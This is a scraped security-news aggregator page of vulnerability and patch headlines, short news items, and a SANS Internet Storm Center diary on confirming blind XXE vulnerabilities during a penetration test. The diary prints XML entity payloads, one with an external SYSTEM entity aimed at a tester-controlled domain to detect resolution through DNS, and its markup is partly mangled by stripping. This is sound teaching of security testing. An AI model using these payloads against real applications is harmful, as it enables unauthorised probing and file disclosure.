Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
FerretCMS Multiple Security Vulnerabilities
 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
WhaTech
Europe dominates the Firestarter's category in Tech Trailblazers with three UK and one French startups recognized alongside Singaporean Firestarter London, UK - January 29th 2015 - The highly successful Tech Trailblazers Awards today announced the ...

and more »
 

This morning, a number of developers signed in to Apple's iTunes Connect service only to be greeted by a list of apps that didn't belong to them. TechCrunch has a good roundup of tweets from affected developers—it seems that whenever developers signed in with their credentials, they were being granted access to other developers' accounts at random.

As of about noon Eastern today, Apple took the service down to resolve the problem. It also looks like developers won't be able to submit new apps or invite new testers to TestFlight while iTunes Connect is down. Affected developers can check Apple's System Status page for developers for updates while they wait for the problems to be resolved (no other developer services appear to be affected by the outage).

We don't yet know whether the outage was caused by some error on Apple's end or by a security breach like the one that brought all developer systems down in the summer of 2013. We've asked Apple when the service will be back and what caused the login problem in the first place, and we'll update this article as we have new details.

Read 1 remaining paragraphs | Comments

 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
RealWire (press release)
The Firestarter programme has been created to ensure dedicated recognition and reward for the new lean startups who are still securing major funding from VCs. This new award has attracted a large number of earlier stage startups from within the ...

and more »
 

Almost exactly a year ago I posted a diary called Is XXE the new SQLi? you can read it at https://isc.sans.edu/diary/Is+XXE+the+new+SQLi/17375. In last year, the things have not changed a lot regarding XXE vulnerabilities. They still seem to be popping up here and there, depending on how XML documents are consumed by server side applications.

Recently I had an interesting engagement where the server side web application consumed an XML document submitted by a user (through a web browser, in a POST HTTP request). Of course, whenever you see XML being used, you should always test for existence of XXE vulnerabilities since their impact can be quite serious check the original diary and can lead from Denial of Service attacks to disclosure of arbitrary files.

In this specific case, however, the problem was that while the application processed the submitted XML document, it never outputted anything from the document: the application would only echo back if processing was successful or not.

So the question that came in mind was on how to confirm if the target application was vulnerable to XXE or not? Sure, I could try to launch a DoS attack to see if it works or not, but since I was dealing with a semi-production system, this was not an option.

Almost like blind SQL injection

This case is very similar to blind SQL injection vulnerabilities: we can modify the input and while we cannot see the output directly, we can deduce what happened on the server side. Let">DocumentLayer
Document InternalID=1
DocumentPointerTest/DocumentPointer
/Document
/DocumentLayer

Of course, in the real test the XML document was much more complex and had some logic for the backend application ">DocumentPointer">!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe Test ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

Simple! If this works, it means that we blindly confirmed that the XML processor on the server side used our reference to the xxe entity. Cool.
The next step is to see if we can use external entities. However, again, since we cannot see the results of the XXE injection, its not all that simple. To make things more complex, the backend server is behind a firewall that does not let this machine connect directly to anything on the Internet. This stops us from using a SYSTEM external entity with a URL supplied.

So is there any other way to confirm that external entities are supported? Probably yes there is one protocol that is almost always allowed, in one sense or another: DNS. In this particular case, this means that we can craft external entity which will resolve to a domain name that we control by checking DNS requests we can see if the entity was resolved correctly or not. In this case it does not matter if the backend server cannot access the Internet or not ">!DOCTYPE DocumentLayer [
!ELEMENT DocumentLayer ANY
!ENTITY xxe SYSTEM http://thisdomaindoesnotexist.infigo.hr/test.txt ]
DocumentLayer
Document InternalID=1
DocumentPointer/DocumentPointer
/Document
/DocumentLayer

While this document will not be processed correctly (remember, the DocumentPointer element must contain the text string Test), the reference will be resolved by the XML processor and by observing the DNS traffic on DNS servers for our domain we will see a request for the submitted domain which will allow us to confirm that XXEs are resolved by the target application.

So, to wrap things up we blindly confirmed the XXE vulnerability in the target application. While in this case our exploitation options are unfortunately limited only to DoS, it is worth noting that the vulnerability exists, and that its only a matter of time when it can be abused further, unless patched.

--
Bojan
@bojanz
INFIGO IS

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Unauthenticated Reflected XSS vulnarbility in Asus RT-N10 Plus router
 
Reflected XSS vulnarbility in Asus RT-N10 Plus Router
 
ESA-2015-002: Unisphere Central Security Update for Multiple Vulnerabilities
 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
Virtual-Strategy Magazine (press release)
The Firestarter programme has been created to ensure dedicated recognition and reward for the new lean startups who are still securing major funding from VCs. This new award has attracted a large number of earlier stage startups from within the ...

and more »
 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
Press Release Rocket
The Firestarter programme has been created to ensure dedicated recognition and reward for the new lean startups who are still securing major funding from VCs. This new award has attracted a large number of earlier stage startups from within the ...

and more »
 
Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385
 
LinuxSecurity.com: Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support. Red Hat Product Security has rated this update as having Critical security [More...]
 
LinuxSecurity.com: Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support. [More...]
 

A Dutch judge has ruled (Google Translate) that an accused Russian “sophisticated hacker” can be extradited to the United States.

The Hague District Court Judge M.E. Groeneveld Stubbe ordered (Google Translate) Tuesday that Vladimir Drinkman first be sent to the US before the Netherlands should even consider a second extradition request made by his home country.

Why? Besides the fact that the US asked first, Russian law forbids extraditing its own citizens, so there is little chance Drinkman would be sent on to face charges in the US. However, Drinkman could conceivably be deported back to Russia, if convicted, once his prison time is complete.

Read 4 remaining paragraphs | Comments

 
LinuxSecurity.com: New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue. [More Info...]
 
LinuxSecurity.com: Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6.5 Extended Update Support. Red Hat Product Security has rated this update as having Important security [More...]
 
LinuxSecurity.com: Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Important security [More...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Updated libyaml packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Moderate security [More...]
 
Drupal Context Module Open Redirection Vulnerability
 
CVE-2014-8779: SSH Host keys on Pexip Infinity
 
AST-2015-001: File descriptor leak when incompatible codecs are offered
 
Cisco Security Advisory: GNU glibc gethostbyname Function Buffer Overflow Vulnerability
 
[slackware-security] glibc (SSA:2015-028-01)
 
KL-001-2015-001 : Windows 2003 tcpip.sys Privilege Escalation
 
Airwatch CVE-2014-8372 Multiple Information Disclosure Vulnerabilities
 
Apple iOS APPLE-SA-2015-01-27-2 Multiple Security Vulnerabilities
 
Multiple Apple Products Multiple Security Vulnerabilities
 

InfoSec heavies weigh in on what the 9th Data Privacy Day taught us
ITProPortal
Today marks the ninth annual Data Privacy Day; the purpose of which is to raise public awareness and advocate data protection and privacy best practices. Over the last year we've seen many high profile breaches, which involved eBay, JPMorgan, and most ...

and more »
 
Linux Kernel 'SMB2_tcon' NULL Pointer Dereference Denial of Service Vulnerability
 
GNU glibc CVE-2015-0235 Remote Heap Buffer Overflow Vulnerability
 
Internet Storm Center Infocon Status